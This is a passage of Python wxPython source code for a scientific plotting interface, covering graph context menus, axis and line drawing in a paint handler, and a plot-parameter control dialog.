self.dispset[0].plots[0]\n\n\n def SetFrontPlot(self, plot):\n self.dispset[0].plots[0] = plot\n\n \n def SetFront(self, graphdisp):\n if len(self.dispset) == 0: \n self.dispset.append(graphdisp)\n else:\n self.dispset[0] = graphdisp\n\n\n def OnRightClick(self, event):\n pos = event.GetPosition()\n menuPlot = wx.Menu()\n subPlot = None\n mod = self.mainwin.mod\n\n if not basicmode:\n if studentmode:\n menuPlot.Append(ID_GraphEPS, \"Export EPS\")\n menuPlot.Append(ID_PlotPanel, \"Plot Panel\")\n menuPlot.Append(ID_UnZoom, \"Zoom Undo\")\n menuPlot.Append(ID_GraphRemove, \"Delete Graph\")\n menuPlot.Append(ID_Output, \"Grid Output\")\n menuPlot.AppendSeparator()\n else:\n #menuPlot->Append(ID_GraphRemove, \"Delete Graph\")\n menuPlot.Append(ID_GraphEPS, \"Export EPS\")\n menuPlot.Append(ID_MultiEPS, \"Multi EPS\")\n menuPlot.Append(ID_MultiCell, \"Multi Cell\")\n menuPlot.Append(ID_Scale, \"Plot Panel\")\n menuPlot.Append(ID_UnZoom, \"Zoom Undo\")\n #menuPlot->Append(ID_Test, \"Test\")\n menuPlot.Append(ID_Output, \"Grid Output\")\n menuPlot.AppendSeparator()\n \n for settag in mod.plotbase.setstore:\n plotset = mod.plotbase.setstore[settag]\n if not plotset.submenu:\n menuitem = wx.MenuItem(menuPlot, wx.ID_ANY, settag, \"\", wx.ITEM_CHECK)\n#ifndef OSX\n #menuitem->SetBitmaps(radio_on, radio_off)\n#endif\n menuPlot.Append(menuitem)\n menuitem.Check(False)\n self.menuIdSetMap[menuitem.GetId()] = settag\n self.Bind(wx.EVT_MENU, self.OnGraphSelectSet, menuitem)\n\n #menuPlot->AppendRadioItem(1000 + i, graphset->name)\n else:\n subPlot = wx.Menu()\n for plottag in plotset.plottags:\n menuitem = wx.MenuItem(subPlot, wx.ID_ANY, plottag, \"\", wx.ITEM_CHECK)\n#ifndef OSX\n #menuitem->SetBitmaps(radio_on, radio_off)\n#endif\n subPlot.Append(menuitem)\n menuitem.Check(False)\n self.menuIdPlotMap[menuitem.GetId()] = plottag\n self.Bind(wx.EVT_MENU, self.OnGraphSelectPlot, menuitem)\n\n #subPlot->AppendRadioItem(2000 + graphset->gindex[j], graphset->GetPlot(j)->gname)\n menuPlot.Append(wx.ID_ANY, settag, subPlot)\n #menuPlot->Check(ID_subplot, true)\n \n #Connect(1000, 1000 + mod->graphbase->numsets - 1, wxEVT_COMMAND_MENU_SELECTED, wxCommandEventHandler(GraphWindow3::OnGraphSelectSet))\n #Connect(2000, 2000 + mod->graphbase->numgraphs, wxEVT_COMMAND_MENU_SELECTED, wxCommandEventHandler(GraphWindow3::OnGraphSelectPlot))\n\n #menuPlot->Check(1000, false)\n\n #Signal current plot/set\n #graphset = mod->graphbase->GetSet(dispset[0]->sdex)\n #if(!graphset->submenu) menuPlot->Check(1000 + dispset[0]->sdex, true)\n #else if(subPlot) subPlot->Check(2000 + dispset[0]->gdex, true)\n #mainwin->diagbox->Write(text.Format(\"\\ngraph menu set %d\\n\", dispset[0]->sdex))\n\n self.PopupMenu(menuPlot, pos.x + 20, pos.y)\n\n\n def OnGraphSelectPlot(self, event):\n id = event.GetId()\n DiagWrite(f\"Graph Plot Select ID {id}\\n\")\n\n plotbase = self.mainwin.mod.plotbase\n plottag = self.menuIdPlotMap[id]\n self.SetFrontPlot(plotbase.GetPlot(plottag))\n\n self.settag = plotbase.GetPlot(plottag).settag\n plotset = plotbase.GetSet(self.settag)\n \n if plotset.submenu:\n plotset.subtag = plottag\n #plotset.subplot[graphindex] = gdex;\n #mod->gtags[graphindex] = graphset->subtag;\n\n #graph = (*mod->graphbase)[gdex];\n #mod->diagbox->Write(text.Format(\"OnGraph id %d set %d name %s plot %d name %s tag %s\\n\", id, graphset->sdex, graphset->name, gdex, plot.gname, mod->graphbase->GetTag(gdex)));\n #mod->diagbox->Write(graphset->Display());\n\n #mod->gcodes[graphindex] = mod->graphbase->GetSetTag(dispset[0]->sdex);\n 
#mod->diagbox->Write(text.Format(\"gcodes index %d settag %s\\n\", graphindex, mod->graphbase->GetSetTag(dispset[0]->sdex)));\n\n self.mainwin.scalebox.ScaleUpdate()\n\n\n def OnGraphSelectSet(self, event):\n id = event.GetId()\n DiagWrite(f\"Graph Set Select ID {id}\\n\")\n\n plotbase = self.mainwin.mod.plotbase\n\n self.settag = self.menuIdSetMap[id]\n plotset = plotbase.GetSet(self.settag)\n plottag = plotset.GetPlot(self.mainwin.scalebox.gflags)\n\n self.SetFrontPlot(plotbase.GetPlot(plottag))\n #self.settag = plotset.tag\n\n #graph = (*mod->graphbase)[gdex];\n #mod->diagbox->Write(text.Format(\"OnGraph id %d set %d name %s plot %d name %s\\n\", id, graphset->sdex, graphset->name, gdex, plot.gname));\n #mod->diagbox->Write(graphset->Display());\n\n #mod->gcodes[graphindex] = mod->graphbase->GetSetTag(id-1000);\n\n #mod->diagbox->Write(text.Format(\"gcodes index %d settag %s\\n\", graphindex, mod->graphbase->GetSetTag(id-1000)));\n\n self.mainwin.scalebox.ScaleUpdate()\n\n\n def PaintBackground(self, dc):\n backgroundColour = self.GetBackgroundColour()\n #if backgroundColour.Ok() == False: backgroundColour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DFACE)\n\n dc.SetBrush(wx.Brush(backgroundColour))\n dc.SetPen(wx.Pen(backgroundColour, 1))\n \n windowRect = wx.Rect(wx.Point(0, 0), self.GetClientSize())\n dc.DrawRectangle(windowRect)\n\n\n def OnPaint(self, event):\n\n #dc = wx.PaintDC(self)\n dc = wx.BufferedPaintDC(self)\n self.PaintBackground(dc)\n gc = wx.GraphicsContext.Create(dc)\n\n drawdiag = True\n\n xlabels = 10\n ylabels = 5\n xylab = 2\n xoffset = 1\n\n xlogbase = 2.71828182845904523536028747135266250 # 3\n ylogbase = 2.71828182845904523536028747135266250 # 10 # default values replaced by graph specific below\n\n xplot = self.xplot\n yplot = self.yplot\n xbase = self.xbase\n ybase = self.ybase\n\n for graphdisp in self.dispset:\n for plot in graphdisp.plots:\n # get plot index\n gplot = graphdisp.plots.index(plot)\n\n # temp test graph\n # plot = PlotDat()\n\n # Graph Parameters\n xfrom = plot.xfrom * plot.xscale\n xto = plot.xto * plot.xscale\n yfrom = plot.yfrom * plot.yscale\n yto = plot.yto * plot.yscale\n \n gc.SetPen(wx.BLACK_PEN)\n gc.SetFont(self.textfont, self.colourpen['black'])\n \n xaxislength = xplot\n #if(plot.axistrace && drawX != -1) xaxislength = drawX * binsize / (xto - xfrom) * xplot\n #mod->diagbox->Write(text.Format(\"drawX %.0f xfrom %.0f xto %.0f xplot %d xaxislength %d\\n\", drawX, xfrom, xto, xplot, xaxislength))\n \n # Draw Axes\n if plot.xaxis: \n gc.StrokeLine(xbase, ybase + yplot, xbase + xaxislength + self.xstretch, ybase + yplot)\n if plot.yaxis: \n gc.StrokeLine(xbase, ybase, xbase, ybase + yplot)\n\n # Draw Axes Ticks and Labels\n\n # tickmode 0 - off | 1 - count | 2 - step\n \n # labelmode 0 - none | 1 - normal | 2 - only end labels\n \n # scalemode 0 - linear | 1 - log\n\n # X-axis\n if plot.xtickmode == 2:\n xlabels = int((xto - xfrom) / (plot.xscale * plot.xstep))\n xplotstep = (xplot * plot.xstep) / (xto - xfrom)\n if xfrom != 0: xtickshift = xfrom\n else: xtickshift = 0\n xtickstart = abs(xtickshift) * xplotstep\n\n if plot.xscalemode == 1 and xfrom > 0: xlogmax = log(xto / xfrom) / log(xlogbase)\n else: xlogmax = 0\n\n if plot.yscalemode == 1 and yfrom > 0: ylogmax = log(yto / yfrom) / log(ylogbase)\n else: ylogmax = 0\n\n for i in range(0, xlabels+1):\n\n #Ticks\n if plot.xtickmode == 2: xcoord = (int(xplotstep * i) + xtickstart)\n else: xcoord = int(i * xplot / xlabels)\n if plot.xtickmode and xcoord <= xaxislength:\n 
gc.StrokeLine(xbase + xcoord, ybase + yplot, xbase + xcoord, ybase + yplot + plot.xticklength)\n\n\n #DiagWrite(f\"xfrom {xfrom} xto {xto} xlabels {xlabels} plot.xscale {plot.xscale} plot.xunitscale {plot.xunitscale}\\n\")\n\n # Labels\n if not plot.xlabelmode or xcoord > xaxislength or plot.xlabelmode == 2 and i > 0 and i < xlabels: continue\n if plot.xtickmode == 2:\n xval = (xfrom + plot.xstep * i) * plot.xunitscale / plot.xunitdscale - plot.xshift - xtickshift\n else:\n xval = ((xto - xfrom) / xlabels * i + xfrom) / plot.xscale * plot.xunitscale / plot.xunitdscale - plot.xshift\n\n srangex = abs((xto - xfrom) / plot.xscale * plot.xunitscale / plot.xunitdscale)\n if plot.xlabelplaces == -1:\n if srangex < 0.1: snum = \"{:.3f}\".format(xval + plot.xdis)\n elif srangex < 1: snum = \"{:.2f}\".format(xval + plot.xdis)\n elif srangex < 10: snum = \"{:.1f}\".format(xval + plot.xdis)\n else: snum = \"{:.0f}\".format(xval + plot.xdis) \n else: snum = f\"{xval + plot.xdis:.{plot.xlabelplaces}f}\"\n\n if GetSystem() == \"Mac\":\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase + xcoord - textsize[0] / 2, ybase + yplot + 8)\n else:\n #gc.GetTextExtent(snum, &textwidth, &textheight)\n #gc->DrawText(snum, xbase + xcoord - textwidth / 2, ybase + yplot + 10)\n textsize = gc.GetTextExtent(snum)\n gc.DrawText(snum, xbase + xcoord - textsize[0] / 2, ybase + yplot + 10)\n\n\n # Y-axis\n if plot.ytickmode == 2:\n ylabels = int((yto - yfrom) / (plot.yscale * plot.ystep))\n yplotstep = (xplot * plot.xstep) / (yto - yfrom)\n\n for i in range(0, ylabels+1):\n\n #Ticks\n if plot.ytickmode == 2: ycoord = int(yplotstep * i)\n else: ycoord = int(i * yplot / ylabels)\n if plot.ytickmode:\n gc.StrokeLine(xbase, ybase + yplot - ycoord, xbase - plot.yticklength, ybase + yplot - ycoord)\n\n # Labels\n if not plot.ylabelmode or plot.ylabelmode == 2 and i > 0 and i < ylabels: continue\n if plot.ytickmode == 2:\n yval = (yfrom + plot.ystep * i) * plot.yunitscale / plot.yunitdscale - plot.yshift\n else:\n yval = ((yto - yfrom) / ylabels * i + yfrom) / plot.yscale * plot.yunitscale / plot.yunitdscale - plot.yshift\n\n srangey = abs((yto - yfrom) / plot.yscale * plot.yunitscale / plot.yunitdscale)\n if plot.ylabelplaces == -1:\n if srangey < 0.1: snum = \"{:.3f}\".format(yval)\n elif srangey < 1: snum = \"{:.2f}\".format(yval)\n elif srangey < 10: snum = \"{:.1f}\".format(yval)\n else: snum = \"{:.0f}\".format(yval) \n else: snum = f\"{yval + plot.ydis:.{plot.ylabelplaces}f}\"\n\n if GetSystem() == \"Mac\":\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase - xylab - plot.yticklength - textsize[0], ybase + yplot - ycoord - textsize[1] / 2)\n else:\n textsize = gc.GetFullTextExtent(snum)\n gc.DrawText(snum, xbase - xylab - plot.yticklength - textsize[0], ybase + yplot - ycoord - textsize[1] / 2)\n\n\n # Plot Label\n if self.yplot < 150: gc.SetFont(self.textfont, self.colourpen['black'])\n textsize = gc.GetTextExtent(plot.label)\n gc.DrawText(plot.label, xbase + xplot - textsize[0], 30 + 15 * gplot)\n\n # Set plot colour\n gc.SetPen(wx.Pen(self.colourpen[plot.colour]))\n\n # Set drawing scales\n xto /= plot.binsize\n xfrom /= plot.binsize\n\n # xrange - pixels per x unit\n # xnum - x units per pixel\n\n yrange = yplot / (yto - yfrom)\n xrange = xplot / (xto - xfrom)\n xnum = (xto - xfrom) / xplot\n\n\n if plot.data.empty: \n #DiagWrite(\"OnPaint: plot {} - no data\\n\".format(plot.label))\n return\n\n\n if plot.type == \"line\": # line graph with scaling fix\n # 
mod->diagbox->Write(text.Format(\"line plot xrange %.4f yscalemode %d ylogbase %.4f ylogmax %.4f\\n\", xrange, plot.yscalemode, ylogbase, ylogmax))\n dir = 1\n pdir = 0\n xindex = int(plot.xfrom)\n maxdex = len(plot.data) - 1\n if xindex > maxdex: break\n preval = plot.data[xindex]\n oldx = xbase + xoffset\n oldy = yplot + ybase - yrange * (preval - yfrom)\n\n path = gc.CreatePath()\n path.MoveToPoint(oldx, oldy)\n\n # subpixel scale drawing mode - drawing data in limited x-axis resolution\n # xrange gives ratio of plot pixels to data points, use this mode if xrange < 1\n #\n # attempt to preserve maxima and minima\n # 'dir' gives current direction of plot progression\n # 'xnum' gives number of data points for current pixel position, reciprocal of xrange\n # choose lowest or highest data point for plot value depending on direction\n\n if xrange < 1: xcount = xplot\n else:\n xcount = int(xplot / xrange)\n if xcount < 1: xcount = 1\n\n for i in range(xcount):\n if(xrange < 1):\n xindex = int((i * xnum) + xfrom)\n if maxdex and maxdex < xindex: # check for end of recorded data range\n # mainwin->diagbox->Write(text.Format(\"data end xcount %d i %d xnum %.4f xindex %d maxdex %d\\n\", xcount, i, xnum, xindex, gdatadv->maxdex()))\n break \n mpoint = plot.data[xindex]\n if isinf(mpoint): break \n\n #if drawdiag: fprintf(ofp, \"xdraw %d preval %.4f dir %d\\n\", i, preval, dir)\n for j in range(1, int(xnum)):\n if xindex + j > maxdex: break\n data = plot.data[xindex + j]\n #if(drawdiag) fprintf(ofp, \"xdraw %d, xnum %d, data %.4f\\n\", i, j, data)\n if dir:\n if data > mpoint: mpoint = data\n elif data < mpoint: mpoint = data\n\n if preval <= mpoint or preval < 0.000001: dir = 1 \n else: dir = 0\n yval = mpoint\n preval = mpoint\n #if(drawdiag) fprintf(ofp, \"xdraw %d preval %.4f mpoint %.4f point %.4f\\n\", i, preval, mpoint, y)\n\n if plot.yscalemode == 1 and yfrom > 0: \n ypos = yplot * (log(yval / yfrom) / log(ylogbase)) / ylogmax # log scaled y-axis March 2018\n if yval < yfrom: ypos = -yfrom * yrange\n #mod->diagbox->Write(text.Format(\"line draw log low value yval %.4f ypos %d\\n\", yval, ypos))\n else: ypos = (yval - yfrom) * yrange\n\n if isinf(ypos) or isnan(ypos): break\n\n #gc.StrokeLine(oldx, oldy, i + xbase + xoffset, int(yplot + ybase - ypos))\n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(i + xbase + xoffset, int(yplot + ybase - ypos))\n oldx = i + xbase + xoffset\n oldy = int(yplot + ybase - ypos)\n\n else:\n xindex = int(i + xfrom)\n if maxdex and maxdex < xindex: break # check for end of recorded data range\n yval = plot.data[xindex]\n\n if plot.yscalemode == 1 and yfrom > 0: \n ypos = yplot * (log(yval / yfrom) / log(ylogbase)) / ylogmax # log scaled y-axis March 2018\n if yval < yfrom: ypos = -yfrom * yrange\n else: ypos = yrange * (yval - yfrom)\n\n #DiagWrite(\"yplot {} ybase {} ypos {}\\n\".format(yplot, ybase, ypos))\n #DiagWrite(\"oldx {} oldy {} newx {} newy {}\".format(oldx, oldy, int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos)))\n if i < xcount: \n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos))\n #gc.StrokeLine(oldx, oldy, int(i * xrange + xbase + xoffset), int(yplot + ybase - ypos))\n else: \n # interpolate y step for last partial x step\n xremain = xplot + xbase + xoffset - oldx\n portion = xrange / xremain\n if portion > 1: portion = 1 / portion # where x plot range is less than one x step in data\n yremain = oldy - (yplot + ybase - yrange * (yval - yfrom))\n 
#mainwin->diagbox->Write(text.Format(\"xcount %d xremain %d portion %.2f yremain %.2f\\n\", xcount, xremain, portion, yremain))\n #gc.StrokeLine(oldx, oldy, xplot + xbase + xoffset, oldy - yremain * portion)\n #path.MoveToPoint(oldx, oldy)\n path.AddLineToPoint(xplot + xbase + xoffset, int(oldy - yremain * portion))\n\n oldx = int(i * xrange + xbase + xoffset)\n oldy = int(yplot + ybase - ypos)\n\n gc.DrawPath(path)\n\n\n\nclass PlotCon(ToolBox):\n def __init__(self, plotpanel, title):\n #wx.Dialog.__init__(plotpanel.mainwin, -1, title, wx.DefaultPosition, wx.Size(325, 930), \n # wx.FRAME_FLOAT_ON_PARENT | wx.FRAME_TOOL_WINDOW | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.RESIZE_BORDER)\n \n #super(PlotCon, self).__init__(None, -1, title, wx.DefaultPosition, wx.Size(320, 600), \n # wx.FRAME_FLOAT_ON_PARENT | wx.FRAME_TOOL_WINDOW | wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX | wx.RESIZE_BORDER)\n \n ostype = GetSystem()\n if ostype == \"Windows\": boxheight = 700\n else: boxheight = 600\n ToolBox.__init__(self, plotpanel.mainwin, \"PlotCon\", title, wx.Point(0, 0), wx.Size(320, boxheight), type)\n\n #ToolBox.__init__(self, parent, \"DiagBox\", title, pos, size)\n \n self.plotpanel = plotpanel\n \n autosynch = False\n buttonheight = 23\n boxfont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n confont = wx.Font(wx.FontInfo(8).FaceName(\"Tahoma\"))\n fontset = plotpanel.mainwin.fontset\n pad = 3\n radpad = 3\n\n #panel = ToolPanel(self, wx.DefaultPosition, wx.DefaultSize)\n #panel.SetFont(boxfont)\n #mainbox = wx.BoxSizer(wx.VERTICAL)\n #panel.SetSizer(mainbox)\n\n self.paramset = ParamSet(self.panel)\n parambox = wx.BoxSizer(wx.HORIZONTAL)\n\n labelwidth = 40\n numwidth = 50\n if ostype == 'Mac': labelwidth = 50\n self.plot = plotpanel.GetFrontPlot()\n self.paramset.AddNum(\"xlabels\", \"X Count\", self.plot.xlabels, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"xstep\", \"X Step\", self.plot.xstep, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabels\", \"Y Count\", self.plot.ylabels, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"ystep\", \"Y Step\", self.plot.ystep, 2, labelwidth, numwidth)\n tickparams = self.ParamLayout(2)\n\n xtickradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Ticks\")\n self.xtickrad = []\n self.xtickrad.append(wx.RadioButton(self.panel, 0, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xtickrad.append(wx.RadioButton(self.panel, 1, \"Count\"))\n self.xtickrad.append(wx.RadioButton(self.panel, 2, \"Step\"))\n xtickradbox.Add(self.xtickrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xtickradbox.Add(self.xtickrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n xtickradbox.Add(self.xtickrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n self.xtickrad[self.plot.xtickmode].SetValue(True)\n\n xlabradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Labels\")\n self.xlabrad = []\n self.xlabrad.append(wx.RadioButton(self.panel, 100, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xlabrad.append(wx.RadioButton(self.panel, 101, \"All\"))\n self.xlabrad.append(wx.RadioButton(self.panel, 102, \"Ends\"))\n xlabradbox.Add(self.xlabrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xlabradbox.Add(self.xlabrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n xlabradbox.Add(self.xlabrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n if self.plot.xlabelmode >= 0 and self.plot.xlabelmode < 3: self.xlabrad[self.plot.xlabelmode].SetValue(True)\n else: DiagWrite(f\"ERROR xlabelmode {self.plot.xlabelmode}\\n\")\n\n ytickradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Ticks\")\n self.ytickrad = 
[]\n self.ytickrad.append(wx.RadioButton(self.panel, 3, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.ytickrad.append(wx.RadioButton(self.panel, 4, \"Count\"))\n self.ytickrad.append(wx.RadioButton(self.panel, 5, \"Step\"))\n ytickradbox.Add(self.ytickrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n ytickradbox.Add(self.ytickrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n ytickradbox.Add(self.ytickrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n self.ytickrad[self.plot.ytickmode].SetValue(True)\n\n ylabradbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Labels\")\n self.ylabrad = []\n self.ylabrad.append(wx.RadioButton(self.panel, 200, \"None\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.ylabrad.append(wx.RadioButton(self.panel, 201, \"All\"))\n self.ylabrad.append(wx.RadioButton(self.panel, 202, \"Ends\"))\n ylabradbox.Add(self.ylabrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n ylabradbox.Add(self.ylabrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n ylabradbox.Add(self.ylabrad[2], 1, wx.TOP | wx.BOTTOM, pad)\n if self.plot.ylabelmode >= 0 and self.plot.ylabelmode < 3: self.ylabrad[self.plot.ylabelmode].SetValue(True)\n else: DiagWrite(f\"ERROR ylabelmode {self.plot.ylabelmode}\\n\")\n\n radbox = wx.BoxSizer(wx.HORIZONTAL)\n radbox.Add(xtickradbox, 1, wx.ALL, radpad)\n radbox.Add(xlabradbox, 1, wx.ALL, radpad)\n radbox.Add(ytickradbox, 1, wx.ALL, radpad)\n radbox.Add(ylabradbox, 1, wx.ALL, radpad)\n\n # Scale mode controls\n xscalemodebox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Scale\")\n self.xscalerad = []\n self.xscalerad.append(wx.RadioButton(self.panel, 10, \"Linear\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xscalerad.append(wx.RadioButton(self.panel, 11, \"Log\"))\n xscalemodebox.Add(self.xscalerad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xscalemodebox.Add(self.xscalerad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.xscalerad[self.plot.xscalemode].SetValue(True)\n\n yscalemodebox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Scale\")\n self.yscalerad = []\n self.yscalerad.append(wx.RadioButton(self.panel, 12, \"Linear\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.yscalerad.append(wx.RadioButton(self.panel, 13, \"Log\"))\n yscalemodebox.Add(self.yscalerad[0], 1, wx.TOP | wx.BOTTOM, pad)\n yscalemodebox.Add(self.yscalerad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.yscalerad[self.plot.yscalemode].SetValue(True)\n\n # Axis mode controls\n xaxisbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"X Axis\")\n self.xaxisrad = []\n self.xaxisrad.append(wx.RadioButton(self.panel, 300, \"Off\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.xaxisrad.append(wx.RadioButton(self.panel, 301, \"On\"))\n xaxisbox.Add(self.xaxisrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n xaxisbox.Add(self.xaxisrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.xaxisrad[self.plot.xaxis].SetValue(True)\n\n yaxisbox = wx.StaticBoxSizer(wx.VERTICAL, self.panel, \"Y Axis\")\n self.yaxisrad = []\n self.yaxisrad.append(wx.RadioButton(self.panel, 400, \"Off\", wx.DefaultPosition, wx.DefaultSize, wx.RB_GROUP))\n self.yaxisrad.append(wx.RadioButton(self.panel, 401, \"On\"))\n yaxisbox.Add(self.yaxisrad[0], 1, wx.TOP | wx.BOTTOM, pad)\n yaxisbox.Add(self.yaxisrad[1], 1, wx.TOP | wx.BOTTOM, pad)\n self.yaxisrad[self.plot.yaxis].SetValue(True)\n\n scalemoderadbox = wx.BoxSizer(wx.HORIZONTAL)\n scalemoderadbox.Add(xaxisbox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(xscalemodebox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(yscalemodebox, 1, wx.ALL, radpad)\n scalemoderadbox.Add(yaxisbox, 1, wx.ALL, radpad)\n\n numwidth = 50\n 
self.paramset.AddNum(\"xshift\", \"XShift\", self.plot.xshift, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"xscale\", \"XScale\", self.plot.xunitscale, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"xdscale\", \"XDScale\", self.plot.xunitdscale, 1, labelwidth, numwidth)\n self.paramset.AddNum(\"xplot\", \"Width\", self.plot.xplot, 0, labelwidth, numwidth)\n #self.paramset.AddNum(\"xlogbase\", \"XLogB\", self.plot.xlogbase, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"xlabelgap\", \"X Gap\", self.plot.xlabelgap, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"xlabelplaces\", \"X Places\", self.plot.xlabelplaces, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"barwidth\", \"Bar Wid\", self.plot.barwidth, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"yshift\", \"YShift\", self.plot.yshift, 2, labelwidth, numwidth)\n self.paramset.AddNum(\"yscale\", \"YScale\", self.plot.yunitscale, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"ydscale\", \"YDScale\", self.plot.yunitdscale, 1, labelwidth, numwidth)\n self.paramset.AddNum(\"yplot\", \"Height\", self.plot.yplot, 0, labelwidth, numwidth)\n #self.paramset.AddNum(\"ylogbase\", \"YLogB\", self.plot.ylogbase, 4, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabelgap\", \"Y Gap\", self.plot.ylabelgap, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"ylabelplaces\", \"Y Places\", self.plot.ylabelplaces, 0, labelwidth, numwidth)\n self.paramset.AddNum(\"bargap\", \"Bar Gap\", self.plot.bargap, 0, labelwidth, numwidth)\n plotparams = self.ParamLayout(2)\n\n self.paramset.GetCon(\"xshift\").SetMinMax(-100000, 100000)\n self.paramset.GetCon(\"yshift\").SetMinMax(-100000, 100000)\n self.paramset.GetCon(\"xlabelplaces\").SetMinMax(-1, 100)\n self.paramset.GetCon(\"ylabelplaces\").SetMinMax(-1, 100)\n\n samplebox = wx.BoxSizer(wx.HORIZONTAL)\n self.paramset.AddNum(\"xsample\", \"XSample\", self.plot.xsample, 0, labelwidth, numwidth)\n samplebox.Add(self.paramset.GetCon(\"xsample\"), 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL)\n clipcheck = wx.CheckBox(self.panel, ID_ClipMode, \"Clip\")\n clipcheck.SetFont(confont)\n clipcheck.SetValue(self.plot.clipmode)\n samplebox.AddSpacer(40)\n samplebox.Add(clipcheck, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL)\n samplebox.AddSpacer(25)\n self.paramset.currlay += 1\n\n self.paramset.AddText(\"label\", \"Name\", self.plot.label, labelwidth)\n self.paramset.AddText(\"xtitle\", \"X Label\", self.plot.xtitle, labelwidth)\n self.paramset.AddText(\"ytitle\", \"Y Label\", self.plot.ytitle, labelwidth)\n labelparams = self.ParamLayout(1)\n\n buttonbox = wx.BoxSizer(wx.HORIZONTAL)\n okButton = wx.Button(self.panel, wx.ID_OK, \"Ok\", wx.DefaultPosition, wx.Size(65, 30))\n printButton = wx.Button(self.panel, ID_Print, \"Export EPS\", wx.DefaultPosition, wx.Size(65, 30))\n closeButton = wx.Button(self.panel, wx.ID_CANCEL, \"Close\", wx.DefaultPosition, wx.Size(65, 30))\n buttonbox.Add(okButton, 1)\n buttonbox.Add(printButton, 1, wx.LEFT, 5)\n buttonbox.Add(closeButton, 1, wx.LEFT, 5)\n\n self.mainbox.AddSpacer(5)\n self.mainbox.Add(tickparams, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n #mainbox.AddStretchSpacer()\n self.mainbox.Add(radbox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, radpad)\n #mainbox.AddStretchSpacer()\n self.mainbox.Add(scalemoderadbox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, radpad)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(plotparams, 0, 
wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.Add(samplebox, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.AddSpacer(5)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(labelparams, 0, wx.ALIGN_CENTRE_HORIZONTAL|wx.ALIGN_CENTRE_VERTICAL|wx.ALL, 0)\n self.mainbox.AddStretchSpacer()\n self.mainbox.Add(buttonbox, 0, wx.ALIGN_CENTRE | wx.TOP | wx.BOTTOM, 5)\n #mainbox->Add(statusbox, 0, wxEXPAND);\n\n self.panel.Layout()\n self.Raise()\n self.Show()\n\n\n def SetGraph(self, newplotpanel = None):\n self.SetParams()\t# read and store params for previous plot\n if newplotpanel: self.plotpanel = newplotpanel # default newgraphwin = None for updating panel without changing graph window\n self.plot = self.plotpanel.GetFrontPlot()\n self.SetControls() # load new plot params and set controls\n\n\n def SetParams(self, setplot = None):\n \n params = self.paramset.GetParams()\n if setplot: self.plot = setplot\n\n self.plot.xlabels = params[\"xlabels\"]\n self.plot.ylabels = params[\"ylabels\"]\n self.plot.xstep = params[\"xstep\"]\n self.plot.ystep = params[\"ystep\"]\n self.plot.xplot = params[\"xplot\"]\n self.plot.yplot = params[\"yplot\"]\n self.plot.xshift = params[\"xshift\"]\n 